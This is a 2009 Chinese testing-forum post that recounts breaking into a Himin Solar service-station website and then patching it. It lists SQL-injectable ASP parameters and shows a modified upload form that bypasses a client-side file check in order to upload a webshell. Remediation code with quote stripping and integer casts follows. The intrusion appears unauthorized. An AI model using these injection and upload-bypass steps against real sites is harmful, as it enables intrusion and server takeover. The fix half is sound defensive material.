51Testing软件测试论坛

 找回密码
 (注-册)加入51Testing

QQ登录

只需一步,快速开始

微信登录,快人一步

手机号码,快捷登录

查看: 3247|回复: 0
打印 上一主题 下一主题

入侵皇明太阳能某服务站并修复漏洞

[复制链接]

该用户从未签到

跳转到指定楼层
1#
发表于 2009-4-21 16:17:56 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
服务器地址:http://www.xxxxxx.cn/
服务器存在漏洞文件:
/proshow.asp?classname=
/newlist.asp?newid=
/prolist.asp?proid=
/order.asp?proid=
可以直接猜出管理员用户名及密码
后台有上传功能:

其对上传文件的合法性判断为本地判断:


我们将添加新闻的页面保存到本地,修改上传文件的限制代码:以下为修改好的代码
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0049)http://www.xxxx.cn/admin/products/picture.asp -->
<HTML><HEAD><TITLE>上传图片</TITLE>
<META http-equiv=Content-Type c><LINK
href="picture.files/style.css" type=text/css rel=stylesheet>
<SCRIPT language=javascript>
// 删除此处的限制代码
</SCRIPT>

<META c name=GENERATOR></HEAD>
<BODY bgColor=#cedbff leftMargin=0 topMargin=0>
<TABLE cellSpacing=0 cellPadding=0 width="100%" align=center border=0>

<FORM language=javascript name=myform  


action=
http://www.xxxxx.cn/admin/products/upfile.asp method=post encType=multipart/form-data>

// 修改提交地址

<TBODY>


<TR vAlign=center align=middle>


<TD align=left height=15><INPUT type=file size=15 name=file1> <INPUT class="txt " type=submit value=
上传 name=B1 isshowprocessbar="True">
</TD></TR></FORM></TBODY></TABLE></BODY></HTML>

这样我们就可以直接上传我们的大马了。
http://www.xxxxxxx.cn/pic/flaw0r.txt


修复漏洞
1./proshow.asp?classname=
<%
classname=replace(request("classname"),"'","")
if classname="" then
set rs=server.CreateObject("adodb.recordset")
rs.open "select * from products order by proid desc",conn,1,1
%>


/newlist.asp?newid=

<%


Set res=Server.CreateObject("ADODB.RecordSet")


sql="select * from news where newid="&
Cint(request("newID"))


res.Open sql,conn,1,1


%>

/prolist.asp?proid=
<%

Set res=Server.CreateObject("ADODB.RecordSet")


sql="select * from products where proid="&
Cint(request("proID"))


res.Open sql,conn,1,1



%>

/order.asp?proid=
<%

Set res=Server.CreateObject("ADODB.RecordSet")


sql="select * from products where proid="&
Cint (request("proID"))



res.Open sql,conn,1,1

%>

此文无任何恶意,望大虾指点,谢谢!

[ 本帖最后由 flaw0r 于 2009-4-21 16:48 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?(注-册)加入51Testing

x
分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
收藏收藏
回复

使用道具 举报

本版积分规则

关闭

站长推荐上一条 /1 下一条

小黑屋|手机版|Archiver|51Testing软件测试网 ( 沪ICP备05003035号 关于我们

GMT+8, 2024-11-23 07:56 , Processed in 0.069064 second(s), 28 queries .

Powered by Discuz! X3.2

© 2001-2024 Comsenz Inc.

快速回复 返回顶部 返回列表